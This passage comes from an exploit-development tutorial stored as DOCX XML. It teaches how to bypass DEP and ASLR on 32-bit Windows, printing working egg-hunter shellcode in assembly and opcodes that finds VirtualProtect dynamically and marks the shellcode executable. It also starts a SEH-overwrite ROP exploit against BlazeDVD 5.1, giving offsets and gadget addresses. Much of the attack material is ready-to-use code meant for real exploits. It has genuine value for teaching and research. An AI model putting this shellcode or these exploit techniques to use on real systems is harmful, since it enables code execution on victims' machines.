          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">flNewProtect : set to 0x40 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">lpflOldProtect : pointer to a writable location </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Finally it needs to call the VirtualProtect() function (making sure the first parameter is at the top of the stack), and that’s it :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>sample asm code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[bits 32]</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push 0x10035005    ;param5 : writable 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;0x40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xor eax,eax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add al,0x40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push eax           ;param4 : flNewProtect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;shellcode length - use 0x300 in this example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add eax,0x7FFFFFBF</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sub eax,0x7FFFFCFF</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push eax         ;param3 : size : 0x300 bytes in this case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push edi           ;param2 : lpAddress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push edi           ;param1 : return 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push 0x7C801AD4    ;VirtualProtect</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ret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>or, in opcode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\x68\x05\x50\x03\x10\x31\xc0\x04</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\x40\x50\x05\xbf\xff\xff\x7f\x2d</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\xff\xfc\xff\x7f\x50\x57\x57\x68</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>\xd4\x1a\x80\x7c\xc3</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So, basically, the entire egg hunter would look like this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#corelanc0d3r - egg hunter which will mark shellcode loc executable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#size to mark as executable : 300 bytes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#writeable location : 10035005</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#XP SP3</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$egghunter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\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02</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\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8</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\x77\x30\x30\x74</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>". # w00t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\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>". #no more jmp edi at the end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#VirtualProtect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\x68\x05\x50\x03\x10\x31\xc0\x04</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\x40\x50\x05\xbf\xff\xff\x7f\x2d</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\xff\xfc\xff\x7f\x50\x57\x57\x68</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>\xd4\x1a\x80\x7c\xc3</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This is a small, but not really a generic egg hunter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So perhaps I can make it more portable (and bigger unfortunately).  If size is not really important, then this might be a generic way to make it work :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>(just edit the "shellcode_size" and "writeable_address" variables in the asm code to match your specific exploit, and you should be ready to use it)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;quick and dirty asm</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;to locate VirtualProtect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;use it to make shellcode at edi</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;executable, and jump to it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;Peter Van Eeckhoutte 'corelanc0d3r</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;http:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="D7DF01"/>
        </w:rPr>
        <w:t>//www.corelan.be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;modify these values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;to match your environment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shellcode_size equ 0x100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writeable_address equ 0x10035005</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hash_virtualprotect equ 0x7946C61B</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[BITS 32]</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global _start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_start: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FLDPI</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FSTENV [ESP-0xC]</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pop eax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push edi  ;save shellcode location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push eax  ;current location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xor edx,edx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mov dl,0x7D   ;offset to start_main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;skylined technique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XOR     ECX, ECX             ; ECX = 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MOV     ESI, [FS:ECX + 0x30] ; ESI = &amp;(PEB) ([FS:0x30])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MOV     ESI, [ESI + 0x0C]    ; ESI = PEB-&gt;Ldr</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MOV     ESI, [ESI + 0x1C]    ; ESI = PEB-&gt;Ldr.InInitOrder</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next_module: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MOV     EAX, [ESI + 0x08]    ; EBP = InInitOrder[X].base_address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MOV     EDI, [ESI + 0x20]    ; EBP = InInitOrder[X].module_name (unicode)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MOV     ESI, [ESI]           ; ESI = InInitOrder[X].flink (next module)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CMP     [EDI + 12*2], CL     ; modulename[12] == 0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JNE     next_module          ; No: try next module.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;jmp start_main     ; replace this with relative jump forward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pop ecx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add ecx,edx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jmp ecx            ;jmp start_main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;=======Function : Find function base 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find_function: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pushad                           ;save all registers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mov ebp,  [esp  +  0x24]         ;put base address of module that is being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;loaded in ebp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mov eax,  [ebp  +  0x3c]         ;skip over MSDOS header</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mov edx,  [ebp  +  eax  +  0x78] ;go to export table and put relative address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;in edx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add edx,  ebp                    ;add base address to it.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;edx = absolute address of export table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mov ecx,  [edx  +  0x18]         ;set up counter ECX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;(how many exported items are in array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mov ebx,  [edx  +  0x20]         ;put names table relative offset in ebx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add ebx,  ebp                    ;add base address to it.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;ebx = absolute address of names table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find_function_loop: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jecxz  find_function_finished    ;if ecx=0, then last symbol has been checked.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;(should never happen)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;unless function could not be found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dec ecx                          ;ecx=ecx-1</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mov esi,  [ebx  +  ecx  *  4]    ;get relative offset of the name associated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;with the current symbol</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;and store offset in esi</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add esi,  ebp                    ;add base address.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;esi = absolute address of current symbol</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compute_hash:</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xor edi,  edi                    ;zero out edi</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xor eax,  eax                    ;zero out eax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cld                              ;clear direction flag.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 xml:space="preserve">;will make sure that it increments instead of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;decrements when using lods*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compute_hash_again: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lodsb                            ;load bytes at esi (current symbol name)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;into al, + increment esi</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test al,  al                      ;bitwise test :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;see if end of string has been reached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jz  compute_hash_finished        ;if zero flag is set = end of string reached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ror edi,  0xd                    ;if zero flag is not set, rotate current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;value of hash 13 bits to the right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add edi,  eax                    ;add current character of symbol name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;to hash accumulator</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jmp compute_hash_again           ;continue loop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compute_hash_finished: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find_function_compare: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cmp edi,  [esp  +  0x28]         ;see if computed hash matches requested hash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 (at esp+0x28)</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;edi = current computed hash</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;esi = current function name (string)</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jnz find_function_loop           ;no match, go to next symbol</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mov ebx,  [edx  +  0x24]         ;if match : extract ordinals table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;relative offset and put in ebx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add ebx,  ebp                    ;add base address.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;ebx = absolute address of ordinals address table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mov cx,  [ebx  +  2  *  ecx]     ;get current symbol ordinal number (2 bytes)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mov ebx,  [edx  +  0x1c]         ;get address table relative and put in ebx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add ebx,  ebp                    ;add base address.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;ebx = absolute address of address table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mov eax,  [ebx  +  4  *  ecx]    ;get relative function offset from its ordinal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;and put in eax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add eax,  ebp                    ;add base address.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;eax = absolute address of function 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mov [esp  +  0x1c],  eax         ;overwrite stack copy of eax so popad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;will return function address in eax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find_function_finished:</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popad                           ;retrieve original registers.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;eax will contain function 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ret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;-----------MAIN-------------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start_main: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mov dl,0x04</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sub esp,edx      ;allocate space on stack</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mov ebp,esp      ;set ebp as frame ptr for relative offset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mov edx,eax      ;save base address of kernel32 in edx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;find VirtualProtect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push hash_virtualprotect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push edx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call find_function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;VirtualProtect is in eax now</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;get shellcode location back</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pop edi</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pop edi</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pop edi</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 xml:space="preserve">pop edi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push writeable_address    ;param5 : writable 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;generate 0x40 (para4)</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xor ebx,ebx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add bl,0x40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push ebx           ;param4 : flNewProtect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 xml:space="preserve">;shellcode length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add ebx,0x7FFFFFBF  ;to compensate for 40 already in ebx</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 xml:space="preserve">sub ebx,0x7FFFFFFF-shellcode_size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push ebx         ;param3 : size : 0x300 bytes in this case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push edi         ;param2 : lpAddress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push edi         ;param1 : return address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push eax         ;VirtualProtect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r>
        <w:rPr/>
        <w:t>ret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 xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Combined with the egg hunter itself, the code would look like this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corelanc0d3r - egg hunter which will mark shellcode loc executable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and then jumps to it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Works on all OSes (32bit) (dynamic VirtualProtect() lookup</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non-optimized - can be made a lot smaller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 Current hardcoded values :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 shellcode size : 300 bytes</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 writeable address : 0x10035005</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my $egghunter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\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02</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\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8</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\x77\x30\x30\x74</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>". # w00t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\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">".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#shellcode is now located. pointer is at edi</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#dynamic call to VirtualProtect &amp; jump to shellcode</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\xd9\xeb\x9b\xd9\x74\x24\xf4\x58</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\x57\x50\x31\xd2\xb2\x7d\x31\xc9</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\x64\x8b\x71\x30\x8b\x76\x0c\x8b</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\x76\x1c\x8b\x46\x08\x8b\x7e\x20</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\x8b\x36\x38\x4f\x18\x75\xf3\x59</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\x01\xd1\xff\xe1\x60\x8b\x6c\x24</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\x24\x8b\x45\x3c\x8b\x54\x05\x78</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\x01\xea\x8b\x4a\x18\x8b\x5a\x20</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\x01\xeb\xe3\x37\x49\x8b\x34\x8b</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\x01\xee\x31\xff\x31\xc0\xfc\xac</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\x84\xc0\x74\x0a\xc1\xcf\x0d\x01</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\xc7\xe9\xf1\xff\xff\xff\x3b\x7c</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\x24\x28\x75\xde\x8b\x5a\x24\x01</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\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c</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\x01\xeb\x8b\x04\x8b\x01\xe8\x89</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\x44\x24\x1c\x61\xc3\xb2\x04\x29</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\xd4\x89\xe5\x89\xc2\x68\x1b\xc6</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\x46\x79\x52\xe8\x9c\xff\xff\xff</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\x5f\x5f\x5f\x5f\x68\x05\x50\x03</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\x10\x31\xdb\x80\xc3\x40\x53\x81</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>\xc3\xbf\xff\xff\x7f\x81\xeb\xff</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>".</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>\xfe\xff\x7f\x53\x57\x57\x50\xc3</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>200 bytes is a bit large for an egg hunter, but hey, it can be optimized a lot (good exercise for you). On the other hand, 200 bytes will fit nicely into WPM(), so you have plenty of options to make this one work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Tip : if you previously allocated "fresh memory" to get the egg hunter to run, then perhaps a simple memcpy of the shellcode, into that same region, might work as well.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="prepend"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r>
        <w:rPr/>
        <w:t>Scenario 2 : prepend the shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If you don’t have enough space to throw in the additional 28 (or about 200 bytes for the generic version), then you can do this :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Take out the "jmp edi" instruction, and replace it with "push edi", "ret"  (x57 xc3) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Then, in the shellcode, between the tag (w00tw00t) and the shellcode itself, you will have to introduce a rop chain, which should mark the current page as executable and run it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If you understood this tutorial so far, you should know how to implement this.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="unicode"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r>
        <w:rPr/>
        <w:t>Unicode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>What if your buffer appears to be subject to unicode ?  Well, the answer is quite simple : you will need to find unicode compatible pointers to rop gadgets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>"pvefindaddr rop" will indicate if a pointer is unicode compatible… just make sure not to use the "nonull" keyword for the function or you won’t see any unicode addresses.  It is clear thought that unicode will decrease your chances on a successful exploit (because the number of usable pointers will be limited)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In addition to this, you will also need to find unicode pointers to the windows API you are going to use to bypass DEP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Good luck !</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="aslr"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r>
        <w:rPr/>
        <w:t>ASLR and DEP ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="theory"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r>
        <w:rPr/>
        <w:t>The theory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Bypassing DEP and ASLR at the same time will require at least one non-ASLR module to be loaded. (well, that’s not entirely true, but in most cases (read: almost all cases), this statement will be valid)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If you have a module that is not ASLR enabled, then you can try to build your rop chain based on pointers from that module alone. Of course, if your rop chain uses an OS function to bypass DEP, you will need to have a pointer to such a call in that module as well.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Alexey Sintsov demonstrated this technique in his </w:t>
      </w:r>
      <w:hyperlink r:id="rId181" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>ProSSHD 1.2 exploit</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Alternatively, you need to find a pointer to the OS module somewhere on the stack, in a register, etc… . If that happens, you can use rop gadgets from the non-aslr module to steal that value and use an offset to that value to get to the address of the OS function.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The bad news is that, if there is not a single module that is not subject to ASLR, then it might be impossible to build a reliable exploit. (you can still try some bruteforcing etc… or find memory leaks/pointers on the stack somewhere).  The good news is that "pvefindaddr rop" will automatically search for non-ASLR modules. So if !pvefindaddr rop shows some output, then the addresses will most likely be reliable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In pvefindaddr v1.34 and up, there is a function called "ropcall", which will search and list all interesting calls to DEP bypass functions, in the loaded modules. This may be helpful in finding an alternative (and perhaps ASLR bypassing) function call.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Example : (on Easy RM to MP3 Converter, module msrmfilter03.dll) :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5972175" cy="628650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="69" name="Image69" descr="">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9" descr="">
                      <a:hlinkClick r:id="rId183"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId182"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5972175" cy="628650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If you can use instructions from a non-ASLR module, and you have a pointer to an ASLR module (OS dll for example) on the stack (or in memory), then perhaps you can take advantage of that, and use an offset to that pointer to find/use other usable instructions from that ASLR enabled module.  The base address of the module might change, but the offset to a certain function should remain the same.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">You can find a nice write-up about an exploit which bypasses ASLR and DEP, without using a non ASLR module </w:t>
      </w:r>
      <w:hyperlink r:id="rId184">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="example"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r>
        <w:rPr/>
        <w:t>An example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In the following example, documented by mr_me, I will show a possible technique to use rop gadgets from a non ASLR compiled module to fetch an OS dll pointer from the stack and use an offset to that pointer to calculate the address of VirtualProtect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If we can find a pointer on the stack, which points to kernel32.dll, then we can modify the value (add or sub an offset) until we reach the relative address of VirtualProtect().</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Test environment : Vista Business SP2, English (Virtualbox).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">For this example we will use a vulnerability in BlazeDVD Professional 5.1, </w:t>
      </w:r>
      <w:hyperlink r:id="rId185">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>discovered</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> in august 2009.  You can download a vulnerable copy of the application here :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Please log in to download BlazeDVD 5.1 Professional (10.6 MiB) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The sample code on exploit-db indicates that the SEH record is overwritten after 608 bytes. We already know that the 4 bytes at nseh at not important in a rop based sploit, so we’ll build a payload that has 612 bytes, and then overwrites se handler with a pointer that would pivot control back to the stack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>You can run "!pvefindaddr noaslr" to list the modules that are not subject to ASLR. You will see that most/all application modules are not ASLR enabled. (Of course, the Windows OS modules are ASLR enabled).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>After having created a rop.txt file (using "!pvefindaddr rop nonull"), and after setting a breakpoint at SEH (so we can calculate the offset to get back to a controlled buffer location the stack), we can conclude that for example "ADD ESP,408 + RET 4" gadget (at 0x616074AE, from EPG.dll) would be a good way to start the chain.  That would make us land in the buffer before the seh chain, which is ok.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Note : it will be important to avoid putting in large amounts of data on the stack after overwriting SEH.  Overwriting the stack may also overwrite/push away the pointer (if any). All you need is a way to trigger an access violation so the overwritten SEH record would kick in and we can gain control over EIP.</w:t>
      </w:r>
    </w:p>
    <w:p>
